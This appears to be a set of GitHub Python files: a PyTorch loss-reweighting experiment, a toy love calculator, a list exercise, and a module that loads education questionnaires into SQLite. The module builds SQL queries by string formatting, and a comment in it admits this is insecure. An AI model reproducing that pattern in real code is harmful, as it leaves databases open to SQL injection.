+{"seq_id":"22556336928","text":"import json\nimport sys, torch\nfrom torch import nn\nfrom math import ceil\nfrom sklearn import datasets\nfrom matplotlib import pyplot as plt\nfrom torch.nn.functional import sigmoid\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.distributions.exponential import Exponential\nfrom scipy.stats import spearmanr\nfrom util_functions.jacobian import truncated_sqrt_exponential_pdf\nfrom classes_losses.acquisition_prediction_losses import ImportanceWeightedBCELoss, NonParametricJacobianTransformedBCELoss, SqrtExponentialJacobianTransformedBCELoss, AdditionImportanceWeightedBCELoss, RescaleBCELoss\n\n\n\nclass LogRegDataset(Dataset):\n\n def __init__(self, x, t):\n self.x = x\n self.t = t\n super(LogRegDataset, self).__init__()\n\n def __getitem__(self, index):\n return self.x[index], self.t[index]\n\n def __len__(self):\n return len(self.x)\n\n\nclass LogRegModel(nn.Module):\n\n def __init__(self):\n super(LogRegModel, self).__init__()\n self.layer = nn.Linear(1, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x: torch.Tensor):\n batch_size = x.size(0)\n x = x.reshape(batch_size, -1, 1)\n x = self.layer(x)\n x = self.sigmoid(x)\n return x\n\n\nclass Simple2DNN(nn.Module):\n\n def __init__(self):\n super(Simple2DNN, self).__init__()\n\n hidden_size = 5\n\n self.layers = nn.Sequential(\n nn.Linear(2, hidden_size), nn.Tanh(), \n # nn.Linear(hidden_size, hidden_size), nn.Tanh(), \n nn.Linear(hidden_size, 1, bias = False), nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.layers(x)\n\n\ndef train_model(model, trainset, testset, opt, crit, num_epochs):\n\n # Initialise loss/rank curves\n train_loss, test_loss, rank_history = [], [], []\n\n for epoch in range(num_epochs):\n\n # Initialise average losses\n epoch_train_loss, epoch_test_loss = 0, 0\n num_train_points, num_test_points = len(trainset.dataset), len(testset.dataset)\n\n model.train()\n \n # Train loop\n for batch in trainset:\n\n opt.zero_grad()\n \n # Unpack batch\n x, t = batch\n \n # Predictions\n y = model(x)\n\n # Get the loss value\n loss = crit(y, t)\n\n # Step\n loss.backward()\n opt.step()\n\n epoch_train_loss += loss.item() / num_train_points\n\n model.eval()\n\n test_batches = []\n test_preds = []\n\n with torch.no_grad():\n\n # Test loop\n for batch in trainset:\n\n opt.zero_grad()\n \n # Unpack batch\n x, t = batch\n \n # Predictions\n y = model(x)\n\n # Save these for the rank metrics\n test_batches.append(t)\n test_preds.append(y)\n\n # Get the loss value\n loss = crit(y, t)\n\n epoch_test_loss += loss.item() / num_test_points\n\n # Calculate rank\n all_ts = torch.concat(test_batches).numpy()\n all_ys = torch.concat(test_preds).numpy()\n s_rank_coeff = spearmanr(all_ys, all_ts)[0]\n\n rank_history.append(s_rank_coeff)\n train_loss.append(epoch_train_loss)\n test_loss.append(epoch_test_loss)\n\n print(f'Epoch {epoch} || Train loss: {round(epoch_train_loss, 5)} | Test loss: {round(epoch_test_loss, 5)} | Test rank {round(s_rank_coeff, 5)}')\n\n return train_loss, test_loss, rank_history\n\n\ndef generate_poly_dataset():\n def bias_regression_function(x, a = 1.1, m = 2.3, S = 3.3):\n \"\"\"\n Desmose form:\n f\\left(x\\right)\\ =\\ 0.65+\\frac{\\left(\\frac{x}{m}-\\left(ax\\right)^{4}-\\left(x\\right)^{14}+0.75\\right)}{S}\\left\\{-1\\le x\\le1\\right\\}\n \"\"\"\n numerator = (x/m) - (a*x)**4 - x**14 + 0.75\n return 0.35 - numerator / S\n\n data_x = 2 * torch.rand(dataset_size) - 1\n data_f = bias_regression_function(data_x)\n data_t = torch.clip(data_f + 0.1 * torch.randn_like(data_f), 0., 1.)\n\n return data_x, data_t\n\n\ndef generate_sigmoid_dataset():\n\n x = torch.linspace(-1, 1, 50)\n t = sigmoid(x)\n\n # Generate the data\n dist = Exponential(0.2)\n data_x = dist.sample_n(dataset_size) - 15\n data_t = sigmoid(data_x/6.)\n\n # Apply transforms\n data_x /= 12.\n data_x += torch.randn_like(data_x)\n data_t -= data_t.min()\n data_t /= data_t.max()\n # data_t = data_t + (torch.randn_like(data_t) * 0.05)\n\n return data_x, data_t\n\n\ndef generate_2D_dataset():\n \n # How many times more class 0 than class 1 (class 0 being sampled from a lower mean distribution)\n bias_ratio = 1.2\n\n # How many datapoints to generate then crop\n _N = int(2 * bias_ratio * dataset_size/(bias_ratio + 1))\n\n # Generate a balanced number of class 0s and 1s\n X, y = datasets.make_moons(_N, noise=0.2, shuffle=False, random_state=42)\n y = torch.tensor(y).float(); y += torch.rand_like(y)*0.1\n y, X = zip(*sorted(zip(y, X), key=lambda x: x[0]))\n X, y = torch.tensor(X), torch.tensor(y)\n\n # Crop dataset to induce bias\n X, y = torch.stack([X[:dataset_size]])[0], torch.stack([y[:dataset_size]])[0]\n\n # More 0s than 1s, and they have the lower mean\n class_0_mean = 4.5\n class_1_mean = 20\n\n # Sample the whole thing\n class_0_samples = Exponential(1/class_0_mean).sample(y.shape)\n class_1_samples = Exponential(1/class_1_mean).sample(y.shape)\n\n # Filter which sample gets what\n y = class_0_samples * (y<0.5).to(int) + class_1_samples * (y>=0.5).to(int)\n\n # Bound outputs\n y = 2*(torch.sigmoid(y/50) - 0.5)\n\n return X.float(), y.float()\n\n\n\nif __name__ == '__main__':\n\n dataset_size = 5000\n\n if sys.argv[1] == 'show_dataset':\n data_x, data_t = generate_2D_dataset()\n \n fig = plt.figure(figsize = (8, 4))\n ax1 = fig.add_subplot(122, projection = '3d')\n ax2 = fig.add_subplot(121)\n\n ax1.scatter(data_x[:,0].numpy(), data_x[:,1].numpy(), data_t.numpy(), c=data_t.numpy())\n ax1.view_init(azim=50)\n ax2.hist(data_t.numpy(), 50)\n\n ax2.set_xlabel()\n\n fig.savefig('jacobian_investigation/2D_dataset.png')\n\n plt.show()\n\n exit() \n\n # Trial parameters, dataset, and model we are using\n if True:\n dataset_name = sys.argv[1]\n\n jacobian = sys.argv[2]\n assert jacobian in ['j', 'nj', 'jnp']\n\n reweigher = sys.argv[3]\n assert reweigher in ['rw', 'rwoff', 'nrw']\n\n if dataset_name == 'poly':\n data_x, data_t = generate_poly_dataset()\n model = LogRegModel()\n\n elif dataset_name == 'sigmoid':\n data_x, data_t = generate_sigmoid_dataset()\n model = LogRegModel()\n\n elif dataset_name == '2D':\n data_x, data_t = generate_2D_dataset()\n model = Simple2DNN()\n\n # Training parameters\n lr = 0.005\n num_epochs = 500\n test_prop = float(sys.argv[4])\n batch_size = 256\n\n # Sort out data\n testset_size = ceil(test_prop * dataset_size)\n trainset_size = dataset_size - ceil(test_prop * dataset_size)\n master_dataset = LogRegDataset(data_x, data_t)\n train_dataset, test_dataset = torch.utils.data.random_split(master_dataset, [trainset_size, testset_size])\n train_dataloader, test_dataloader = DataLoader(train_dataset, batch_size=batch_size), DataLoader(test_dataset, batch_size=batch_size)\n\n # Get this for the Jacobian case\n train_targets = data_t[train_dataset.indices]\n test_targets = data_t[test_dataset.indices]\n\n # Optimiser\n optimiser = torch.optim.SGD(lr=lr, params=model.parameters())\n\n # Star of the show: loss function\n # do we use Jacobian or not?\n if jacobian == 'j':\n criterion_type = SqrtExponentialJacobianTransformedBCELoss\n criterion_args = [train_targets, 0.00001, torch.tensor(6), 200, lambda x: x]\n if jacobian == 'jnp':\n criterion_type = NonParametricJacobianTransformedBCELoss\n criterion_args = [train_targets, 500, lambda x: x]\n elif jacobian == 'nj':\n criterion_type = RescaleBCELoss\n criterion_args = [torch.tensor(1)]\n\n # do we do loss reweighting or now?\n if reweigher == 'rw':\n # For now, fix the num bins to 50, and only update once\n criterion = AdditionImportanceWeightedBCELoss(criterion_type(*criterion_args), 50, dataset_size)\n elif reweigher == 'rwoff':\n criterion = AdditionImportanceWeightedBCELoss(criterion_type(*criterion_args), 50, train_targets)\n elif reweigher == 'nrw':\n criterion = criterion_type(*criterion_args)\n\n print('Starting training')\n\n train_loss, test_loss, rank_history = train_model(model, train_dataloader, test_dataloader, optimiser, criterion, num_epochs)\n\n # Plot dataset and results\n fig, axs = plt.subplots(2, 3, figsize = (15, 10))\n\n # First dataset/function plotting method only works for 1D input\n if dataset_name != '2D':\n axs[0, 0].scatter(data_x.numpy(), data_t.numpy())\n axs[0, 0].set_title('dataset')\n\n # Get the model curve\n model.eval()\n x = torch.linspace(-1, 4, 50)\n fitted_function = model(x).detach().reshape(-1)\n axs[0, 0].plot(x.numpy(), fitted_function.numpy())\n\n if jacobian in ['j', 'jnp']:\n # If using the Jacobian distribution, histogram the transformed training data\n transformed_targets = criterion._transform_target(test_targets)\n axs[0, 2].set_title(f'J transformed data')\n axs[0, 2].hist(transformed_targets.numpy(), 50, density = True)\n\n if jacobian in ['j']:\n # If using the Jacobian distribution, histogram the transformed training data\n transformed_targets = criterion._transform_target(test_targets)\n axs[0, 2].set_title(f'J transformed data, $\\\\beta = {criterion.beta.item()}$')\n axs[0, 2].hist(transformed_targets.numpy(), 50, density = True)\n\n # Also plot the fitted truncated sqrt exponential pdf\n x = torch.linspace(0, 1, 50)\n y = truncated_sqrt_exponential_pdf(x, criterion.beta)\n axs[0, 1].plot(x, y)\n\n axs[0, 1].set_title('target distribution')\n axs[0, 1].hist(data_t.numpy(), 50, density = True)\n\n axs[1, 0].plot(train_loss); axs[1, 0].set_title('train_loss')\n axs[1, 1].plot(test_loss); axs[1, 1].set_title('test_loss')\n\n # Scatted the model predictions\n # preds = model(data_x[test_dataset.indices]).detach().reshape(-1)\n # axs[1, 2].scatter(test_targets.numpy(), preds.numpy())\n\n axs[1, 2].plot(rank_history)\n\n # axs[1, 2].plot([0, 1], [0, 1], color = 'black')\n\n if len(sys.argv) > 5:\n results = {\n 'jacobian_setting': jacobian,\n 'reweigher_setting': reweigher,\n 'test_prop': test_prop,\n 'train_loss': train_loss,\n 'test_loss': test_loss,\n 'rank_history': rank_history\n }\n json_path = sys.argv[5]\n with open(json_path, 'w') as f:\n json.dump(results, f)\n else:\n fig.savefig(f'jacobian_investigation/{dataset_name}-{sys.argv[2]}-{sys.argv[3]}-{test_prop}.png')\n\n\n","repo_name":"puria-radmard/iib_project","sub_path":"jacobian_investigation/loss_reweight_test.py","file_name":"loss_reweight_test.py","file_ext":"py","file_size_in_byte":11211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"39026472400","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport random\r\nfrom tkinter.messagebox import showinfo\r\nfrom PIL import Image,ImageTk\r\n\r\nroot=Tk()\r\nroot.title(\"Love calculater\")\r\ndef love_calculate():\r\n if name_entry.get()==\"\" or p_name_entry.get()==\"\" :\r\n messagebox.showwarning(\"warning\",\"please fill all the fields\")\r\n \r\n else:\r\n percentage=random.randint(60,100)\r\n emoji=\"\\u2764\\uFE0F\"\r\n showinfo(\"Love percentage\",f\"Love bird's love is{emoji} {percentage}%\")\r\n\r\nimg_open=Image.open(\"chubby.jpg\")\r\nrender_img=ImageTk.PhotoImage(img_open)\r\noriginal_img=Label(root,image=render_img)\r\noriginal_img.grid(row=0,columnspan=2)\r\n\r\n\r\nname=Label(root,text=\"Enter your name :\",font=(\"ariar\",10,\"bold\"))\r\nname.grid(row=2,column=0)\r\n\r\n\r\nname_entry=Entry(root,font=(\"ariar\",10,\"bold\"))\r\nname_entry.grid(row=2,column=1)\r\n\r\n\r\np_name=Label(root,text=\"Enter your partner name :\",font=(\"ariar\",10,\"bold\"))\r\np_name.grid(row=3,column=0)\r\n\r\n\r\np_name_entry=Entry(root,font=(\"ariar\",10,\"bold\"))\r\np_name_entry.grid(row=3,column=1)\r\n\r\n\r\nbutton=Button(root,text=\"Check your love\",bg=\"red\",fg=\"white\",command=love_calculate)\r\nbutton.grid(row=4,columnspan=2)\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"shaikaneef/LoveCalculater","sub_path":"love_calculater.py","file_name":"love_calculater.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"22105939373","text":"number = input()\nif(number.isnumeric()):\n number=int(number)\nlst = []\nfor i in range(1, number+1):\n row = []\n for j in range(1, i+1):\n row.append(i*j)\n lst.append(row)\nprint(lst[::2])\n","repo_name":"MohammedMahmoud20/iti_summer_training_python_labs","sub_path":"first_day/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1795196688","text":"# import sqlite3 #sql connection\nimport xlrd #to read excel file\nfrom xlrd import open_workbook\nimport re\nimport collections #enable namedtuple: varname = collections.namedtuple('varname','val1, val2, val3..') and ordered dic\nimport sys, json\nimport os\nfrom functools import reduce\nimport shutil\nimport datetime\nfrom itertools import chain\nimport time\nfrom time import sleep\nfrom rmsqlfunctions import *\n\n# if ( re.search('\\\\\\\\Tests\\\\\\\\mo$',os.getcwd()) or re.search('/Tests/os$',os.getcwd()) or\n # re.search('/Tests/mo$',os.getcwd()) ):\n# with open(\"../../Libraries/variables_for_preprocessing.json\") as f:\n# pre_vars=json.loads(f.read())\n# else:\nwith open(\"Libraries/variables_for_preprocessing.json\") as f:\n pre_vars=json.loads(f.read())\n\n####DATA EXTRACTION\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n# def getADM_CODE(co_code):\n# \"\"\" SQL extract of ADM codes.\"\"\"\n# sql_str = 'Select ADM_CODE from REGIONS where CO_CODE ={0}'.format(co_code)\n# sql_str = sql_query(sql_str)[0]\n\ndef getADM_DISTINCT(co_code,year):\n \"\"\" SQL extract distinct number of ADM(s).\"\"\"\n sql_str = 'SELECT COUNT(ADM_CODE) FROM REGIONS WHERE CO_CODE={0} AND MC_YEAR={1}'.format(co_code, year)\n query = sql_query(sql_str)[0]\n return(query[0])\n \ndef getCO_CODE(country_name):\n \"\"\" SQL extract a country code given the long or short name.\n\n If the exact country name is found, it gives back the code,\n otherwise it returns None.\n \"\"\"\n name = country_name.upper().replace(\"'\", \"''\")\n sql_str = (\"SELECT CO_CODE FROM COUNTRY \"\n \" WHERE UPPER(CO_LONG_NAME) IS '{0}' \"\n \" OR UPPER(CO_SHORT_NAME) IS '{0}' \".format(name))\n code = sql_query(sql_str)\n if code:\n return(code[0][0])\n \ndef getCO_NAME(co_code, short=True):\n \"\"\" SQL extract a country name given the country code.\n\n If the country name is found it returns it, otherwise it returns None.\n \"\"\"\n if short:\n var = 'CO_SHORT_NAME'\n else:\n var = 'CO_LONG_NAME'\n sql_str = (\"SELECT {0} FROM COUNTRY \"\n \" WHERE CO_CODE ={1} \".format(var , co_code))\n code = sql_query(sql_str)\n if code:\n return(code[0][0])\n\ndef getAvailable_countries():\n \"\"\" SQL extract the tuple of the available countries.\"\"\"\n sql_str = (\"SELECT DISTINCT b.CO_SHORT_NAME FROM REGIONS as a \"\n \"left join COUNTRY as b on a.CO_CODE = b.CO_CODE \"\n \"where a.ADM_CODE >0 order by b.CO_SHORT_NAME\")\n res = sql_query(sql_str)\n if res:\n return(res)\n\ndef getAvailable_year(co_name):\n \"\"\" SQL extract data year(s) of the submitted questionnaires.\"\"\"\n name = co_name.upper().replace(\"'\", \"''\")\n\n sql_str = (\"SELECT DISTINCT A.EMCO_YEAR FROM EDU_METER97_REP AS A \"\n \"LEFT JOIN COUNTRY AS B ON B.CO_CODE = A.CO_CODE \"\n \"WHERE UPPER(B.CO_SHORT_NAME) IS UPPER('{0}') order by A.EMCO_YEAR\".format(name)) #900001 == Pop.Ag0t99\n code = sql_query(sql_str)\n if code:\n return(list(chain.from_iterable(code)))\n\n####DATA INSERTION\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\ndef moveSerie(co_code, year, from_serie, to_serie):\n \"\"\" SQL moving of data between series, from/to REP, OBS or EST.\n \n So far, it modifies the following 3 SQL table:\n 1 - EDU_METER97_{}\n 2 - EDU_INCLUSION{}\n 3 - EDU_FTN97_{}\n 4 - EDU_COMMENT_TABLE_{}\n\"\"\"\n ### Move EDU_METER97\n ## Current year\n print('Moving data for {0}-{1}'.format(co_code, year))\n ### Deleting existing data\n sql_query((\"DELETE FROM EDU_FTN97_{0} where CO_CODE ={1} and \"\n \"((EMCO_YEAR ={2} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR=0)) OR \"\n \"(EMCO_YEAR ={3} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR=0)))\".format(to_serie, co_code,year, year -1)))\n sql_query((\"DELETE FROM EDU_INCLUSION_{0} where CO_CODE ={1} and \"\n \"((EMCO_YEAR={2} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR = 0)) OR \"\n \"(EMCO_YEAR={3} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR = -1 )))\".format(to_serie, co_code,year, year -1)))\n for ind in [0,-1]:\n meter = (\"INSERT OR REPLACE INTO EDU_METER97_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"left join EDU_METER97_{2} as a on a.EMC_ID = b.EMC_ID and b.CUR_YEAR ={4} \"\n \"where a.co_code ={0} \"\n \"and a.EMCO_YEAR ={1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n ### Moving EDU_INCLUSION\n ### Current year\n inclu= (\"INSERT OR REPLACE INTO EDU_INCLUSION_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"join EDU_INCLUSION_{2} as a on a.EMC_ID = b.EMC_ID and b.Cur_Year = {4} \"\n \"where a.co_code ={0} \"\n \"and a.EMCO_YEAR ={1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n ### Current year\n ftn = (\"INSERT OR REPLACE INTO EDU_FTN97_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"left join EDU_FTN97_{2} as a on a.EMC_ID = b.EMC_ID and b.CUR_YEAR = {4} \"\n \"where a.co_code = {0} \"\n \"and a.EMCO_YEAR = {1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n sql_query(meter,False)\n sql_query(inclu, False)\n sql_query(ftn,False)\n\n print(\"Moved METER, INCLU and FTN tables from {0} to {1}\".format(from_serie, to_serie))\n\n ### Moving EDU_COMMENT_TABLE\n ### Current year\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_{0} where CO_CODE ={1} and EMCO_YEAR = {2} and WT_NAME in (select RM_TABLE from RM_Mapping_NonNumeric)\".format(to_serie, co_code,year))\n table_com = (\"INSERT OR REPLACE INTO EDU_COMMENT_TABLE_{3} \"\n \"SELECT a.* FROM RM_Mapping_NonNumeric as b \"\n \"join EDU_COMMENT_TABLE_{2} as a on a.WT_NAME = b.RM_TABLE \"\n \"where a.co_code = {0} \"\n \"and a.EMCO_YEAR = {1}\".format(co_code, year, from_serie, to_serie))\n sql_query(table_com, False)\n\n print(\"Moved COMMENT_TABLE table from {0} to {1}\".format(from_serie, to_serie))\n \n\ndef delete_questionnaire(co_code, year):\n \"\"\" Delete all questionnaire data and indicators\"\"\"\n ## REP\n sql_query(\"DELETE FROM EDU_METER97_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ##OBS\n sql_query(\"DELETE FROM EDU_METER97_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ## EST\n sql_query(\"DELETE FROM EDU_METER97_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ## Indic and audit trail\n sql_query(\"DELETE FROM METER_AUDIT_TRAIL WHERE CO_CODE = {0} AND MC_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INDICATOR_EST WHERE CO_CODE = {0} AND IND_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM INDICATOR_AUDIT_TRAIL WHERE CO_CODE = {0} AND IND_YEAR = {1};\".format(co_code, year), False)\n ## Regions\n sql_query(\"DELETE FROM REGIONS WHERE CO_CODE = {0};\".format(co_code), False)\n \n####MISC\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n\ndef indexes(cellname):\n \"\"\"This function returns a vector with the indices of a cell given its name.\n\n For example if cellname='A1' it returns [0,0].\n \"\"\"\n match1 = re.search('[A-Z]+',cellname)\n col_name = match1.group()\n N = len(col_name)\n col_index = 0\n for index in range(N):\n col_index = col_index+(ord(col_name[index])-ord('A')+1)*26**(N-1-index)\n match2 = re.search('[0-9]+',cellname)\n row_index = int(match2.group())\n return [row_index-1,col_index-1]\n\ndef indexes_inverse(xlrd_coordinates):\n \"\"\"Returns excel coordinates given a vector with xlrd coordinates.\n\n It works for a maximum of two letters in the column name.\n \"\"\"\n # The following gives the number of letters\n column_letter=\"\"\n quotient=int(xlrd_coordinates[1] / 26 )\n letter_number= xlrd_coordinates[1] % 26\n if(quotient):\n column_letter= chr(ord('A')+ (quotient-1))\n column_letter = column_letter + chr( ord('A') + letter_number )\n xl_reference=column_letter + str( xlrd_coordinates[0] + 1 )\n return(xl_reference)\n\ndef is_reference(cell_value):\n \"\"\"Checks if a value is a reference to another cell.\n\n This functions receives a string, and checks if it has the form\n X[a:b]. If yes, it returns [a,b], else it returns None. \n If it has the form X[:b] it returns [None,b].\n If it is only X, it returns the string \"empty_reference\"\n \"\"\"\n if type(cell_value) in [int,float]:\n return(None)\n match=re.search('[Xx]\\[([0-9]*):([0-9]+)\\]$|[Xx]',cell_value)\n if not (match==None):\n reference=list(match.groups())\n if reference[1]==None:\n return(\"empty_reference\")\n if reference[0]=='':\n reference[0]=None\n else:\n reference[0]=int(reference[0])\n reference[1]=int(reference[1])\n return( reference )\n else:\n return(None)\n\ndef ec_td_id(sheet_name):\n \"\"\"Returns the EC_TD_ID given the sheet name.\n \"\"\"\n if sheet_name == \"Administrative divisions\":\n return(1)\n elif sheet_name == \"Pupils\":\n return(3)\n else:\n return(2)\n\n\ndef mg_id(cell_value):\n \"\"\"This function gets the MG_ID for the read data\n\n This works for the meters table only. Reading a number will return\n an empty string.\n\n \"\"\"\n if((type(cell_value) == int or type(cell_value) == float) ):\n if cell_value>0:\n return(\"\")\n else:\n return(1)\n elif is_reference(cell_value):\n return(3)\n else:\n match_old_nil=re.search('[Nn]$',cell_value)\n match_not_applicable=re.search('[Aa]$|^[Zz]$',cell_value)\n match_missing=re.search('^ *$|^[Mm] *',cell_value)\n if (not (match_old_nil == None)):\n return(1)\n elif (not (match_not_applicable == None) ):\n return(6)\n elif (not (match_missing == None)):\n return(\"D\")\n \n\n####DATA EXTRACTION CLASS\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n\n\nclass questionnaire:\n \"\"\"Defines questionnaire properties and methods\n \n Attributes:\n wb = the workbook that correspond to the class.\n conn = connection object to the database\n emco_year = the emco_year read from the workbook.\n nadm1 = number of administrative divisions in the file\n country_name = the name of the country that filled the questionnaire.\n country_code = the code of the country.\n edit_mode = True or False, whether the class if going to be used for editing existing data.\n missing_data_dictionary = Dictionary whose keys are sheet names. The values are another dictionary \n whose keys are table names and values column numbers. These column numbers \n contain missing values.\n data_issues_dictionary = Similar to missing data dictionary, but it has three levels of dicionaries.\n sheet name : table name : data issue type : issue information.\n \"\"\"\n def set_workbook(self,excel_file):\n \"\"\"Set the workbook\n\n excel_file should be the full path to the excel file.\n \"\"\"\n self.wb=open_workbook(excel_file)\n\n def set_database_connection(self,database_file):\n \"\"\"Sets the connection to the database.\"\"\"\n self.conn=sqlite3.connect(database_file)\n\n def get_emco_year(self):\n \"\"\"Sets the attribute emco_year.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.emco_year= sheet.cell(2,1).value\n if (type(self.emco_year) in [int,float] and self.emco_year>0 ):\n self.emco_year=int(self.emco_year)\n else:\n self.emco_year=False\n else:\n # # Old way \n # front_page_variables = pre_vars['fixed_sheets']['Front Page']\n # sheet = self.wb.sheet_by_name('Front Page')\n # self.front_page_year = int(sheet.cell( *indexes( front_page_variables['school_year_ending'][0] ) ).value)\n # # New way\n sheet=self.wb.sheet_by_name('Policy information')\n self.emco_year=sheet.cell(*indexes('M14')).value\n \n def get_nadm1(self):\n \"\"\"Sets the attribute nadm1 based on the questionnaire.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.nadm1= sheet.cell(4,1).value\n if (type(self.nadm1) in [int,float] and self.nadm1>0 ):\n self.nadm1=int(self.nadm1)\n else:\n self.nadm1=False\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet = self.wb.sheet_by_name('Administrative divisions')\n try:\n self.nadm1 = sheet.cell( *indexes( administrative_divisions_variables['adm1_number'][0] ) ).value\n except(IndexError):\n self.nadm1 = False\n \n if (type(self.nadm1) in [int,float] and self.nadm1>0 ):\n self.nadm1=int(self.nadm1)\n else:\n self.nadm1=False\n\n def get_country_name(self):\n \"\"\"Sets the country name based on the front page of the questionnaire.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.country_name = sheet.cell( 0,1 ).value\n else:\n front_page_variables = pre_vars['fixed_sheets']['Front Page']\n sheet = self.wb.sheet_by_name('Front Page')\n self.country_name = sheet.cell( *indexes( front_page_variables['country_name'][0] ) ).value\n \n def get_database_type(self):\n \"\"\"Sets the database type (OBS,REP,EST).\n\n If it is an edited questoinnaire it reads the database type\n from the information section that is in the upper right part\n of each sheet.\n\n If it is a new questionnaire it will take the value REP.\n \"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.database_type = sheet.cell( 5,1 ).value\n else:\n self.database_type='REP'\n \n def get_country_code(self):\n \"\"\"Sets the country code by looking in the COUNTRY table.\n\n This function searches the country code in the COUNTRY table\n using the self.country_name variable of the class. It assumes\n that there will be an exact match up to case. If this is not\n the case it returns None.\n \"\"\"\n name=self.country_name.upper()\n # The following is necessary for compatibility with sql syntax\n name=\"'\"+re.sub(\"'\",\"''\",name)+\"'\"\n cursor=self.conn.cursor()\n #The following is not working so I am using .format, but this is not secure\n# cursor.execute(u'SELECT CO_CODE FROM COUNTRY WHERE UPPER(CO_LONG_NAME) IS ?', (name,) )\n cursor.execute(\"SELECT CO_CODE FROM COUNTRY WHERE UPPER(CO_LONG_NAME) IS {0};\".format(name) )\n country_code=cursor.fetchone()\n if(country_code==None):\n self.country_code=0\n else:\n self.country_code=country_code[0]\n cursor.close()\n\n def emc_id(self,table_name,column):\n \"\"\"Returns the emc_id given the table and column number.\n \"\"\"\n cursor=self.conn.cursor()\n cursor.execute(\"SELECT EMC_ID FROM RM_MAPPING WHERE RM_TABLE=\\\"{0}\\\" AND Col={1};\".format(table_name,column ) )\n return(cursor.fetchone()[0])\n \n def check_nadm1(self):\n \"\"\"Checks that number of administrative divisions is filled with a positive integer. \n \"\"\"\n if( (type(self.nadm1) == int or type(self.nadm1) == float) and int(self.nadm1)==self.nadm1 and self.nadm1 > 0 ):\n self.print_log(\"Number of administrative divisions: {0}\\n\".format(self.nadm1))\n return(True)\n else:\n self.print_log(\"Error: Wrong value for number of administrative divisions.\\n\")\n return(False)\n\n def check_adm1_label(self):\n \"\"\"Checks that the name of administrative divisions are not empty. \"\"\"\n if self.edit_mode:\n return(True)\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet = self.wb.sheet_by_name('Administrative divisions') \n adm1_label = sheet.cell( *indexes( administrative_divisions_variables['adm1'][0] ) ).value \n if( (type(adm1_label) == str) and adm1_label ):\n self.print_log(\"ADM1 name provided: {0}\\n\".format(adm1_label))\n return(True)\n else:\n self.print_log(\"Error: ADM1 name not provided.\\n\")\n return(False)\n\n \n def check_adm1_names(self):\n \"\"\"Checks that the administrative division names are filled.\"\"\"\n if (self.edit_mode):\n return(True)\n elif (not self.nadm1):\n return(False)\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet=self.wb.sheet_by_name('Administrative divisions')\n id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0])\n 